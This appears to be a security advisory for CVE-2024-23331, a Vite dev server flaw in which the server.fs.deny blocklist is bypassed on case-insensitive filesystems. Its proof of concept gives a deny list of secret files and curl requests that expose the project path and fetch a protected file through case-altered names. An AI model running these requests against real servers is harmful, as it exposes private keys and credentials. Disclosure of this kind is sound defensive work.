GoogleOSV:GHSA-C24V-8RFC-W8VWVite dev server option `server.fs.deny` can be bypassed when hosted on case-insensitive filesystem
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
AI Score
Confidence
Low
EPSS
Percentile
50.6%
Summary
Vite dev server option server.fs.deny can be bypassed on case-insensitive file systems using case-augmented versions of filenames. Notably this affects servers hosted on Windows.
This bypass is similar to https://nvd.nist.gov/vuln/detail/CVE-2023-34092 – with surface area reduced to hosts having case-insensitive filesystems.
Patches
Fixed in [email protected], [email protected], [email protected], [email protected]
Details
Since picomatch defaults to case-sensitive glob matching, but the file server doesn’t discriminate; a blacklist bypass is possible.
See picomatch usage, where nocase is defaulted to false: https://github.com/vitejs/vite/blob/v5.1.0-beta.1/packages/vite/src/node/server/index.ts#L632
By requesting raw filesystem paths using augmented casing, the matcher derived from config.server.fs.deny fails to block access to sensitive files.
PoC
Setup
- Created vanilla Vite project using
npm create vite@lateston a Standard Azure hosted Windows 10 instance.npm run dev -- --host 0.0.0.0- Publicly accessible for the time being here: http://20.12.242.81:5173/
- Created dummy secret files, e.g.
custom.secretandproduction.pem - Populated
vite.config.jswith
export default { server: { fs: { deny: ['.env', '.env.*', '*.{crt,pem}', 'custom.secret'] } } }
Reproduction
curl -s http://20.12.242.81:5173/@fs//- Descriptive error page reveals absolute filesystem path to project root
curl -s http://20.12.242.81:5173/@fs/C:/Users/darbonzo/Desktop/vite-project/vite.config.js- Discoverable configuration file reveals locations of secrets
curl -s http://20.12.242.81:5173/@fs/C:/Users/darbonzo/Desktop/vite-project/custom.sEcReT- Secrets are directly accessible using case-augmented version of filename
Proof
Impact
Who
- Users with exposed dev servers on environments with case-insensitive filesystems
What
- Files protected by
server.fs.denyare both discoverable, and accessible
References
github.com/vitejs/vite
github.com/vitejs/vite/commit/0cd769c279724cf27934b1270fbdd45d68217691
github.com/vitejs/vite/commit/91641c4da0a011d4c5352e88fc68389d4e1289a5
github.com/vitejs/vite/commit/a26c87d20f9af306b5ce3ff1648be7fa5146c278
github.com/vitejs/vite/commit/eeec23bbc9d476c54a3a6d36e78455867185a7cb
github.com/vitejs/vite/security/advisories/GHSA-c24v-8rfc-w8vw
nvd.nist.gov/vuln/detail/CVE-2023-34092
nvd.nist.gov/vuln/detail/CVE-2024-23331
vitejs.dev/config/server-options.html#server-fs-deny
Related
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
AI Score
Confidence
Low
EPSS
Percentile
50.6%